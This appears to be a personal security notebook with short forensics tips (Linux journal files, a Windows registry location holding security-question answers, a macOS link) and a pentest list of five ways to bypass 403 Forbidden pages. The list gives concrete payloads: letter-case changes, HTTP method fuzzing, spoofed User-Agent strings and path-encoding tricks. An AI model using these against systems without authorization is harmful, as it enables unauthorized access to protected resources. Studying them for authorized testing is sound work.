This is just a notebook for myself. Nothing to see here, move along!
| WINDOWS | ||
| Security questions | UTF-16LE JSON stored as ResetData REG_BINARY in HKLM\SAM\SAM\Domains\Account\Users | |
Tool to read password hints: https://github.com/gtworek/PSBits/blob/master/Misc2/ReadResetData.c
Forensics analysis of Linux systems: remember to check the journal files (/var/log/journal)
journalctl –file <file-name>.journal -o verbose > journal-file.txt
Note the use of verbose flag here. It provides you with much needed information such as the command line arguments.
(Source: https://twitter.com/_abhiramkumar/status/1788869652229267653)
PenTest-things
🚫 5 Ways to Bypass 403 Forbidden 👇
If you’ve ever hit a 403 Forbidden page, congratulations, you might be on the verge of finding something juicy the developers meant to hide. 😉
1. Change the Letter Case
/admin → 403 Forbidden
/AdMiN → 200 OK
Some servers are case-sensitive. Try variations in upper and lower case letters.
2. Alternate HTTP Versions
Try using: HTTP/0.9, HTTP/1.0, HTTP/1.1, HTTP/2, HTTP/3
Mismatched or unsupported versions can sometimes lead to unexpected behavior — and even grant access.
3. HTTP Method Fuzzing
GET /admin → 403
POST /admin → 403
PATCH /admin → 200 OK
Try different HTTP methods: GET, POST, PUT, PATCH, OPTIONS, DELETE, etc. Some endpoints respond differently.
4. User-Agent Fuzzing
Modify the User-Agent header to impersonate different clients. For example:
User-Agent: Googlebot
User-Agent: InternalScanner/1.0
User-Agent: curl/7.64.1
Some servers allow or deny access based on what client you appear to be.
5. Path Fuzzing
Trick the URL parser using alternate path structures or encodings:
/admin/..;/
/./admin/
//admin//
/admin?
%2e%2e/admin
Even small changes in the path can bypass improperly configured access controls.
Mac Forensics – some tips:
https://medium.com/@jakeperalta7/macos-forensics-101-290fa7c8201a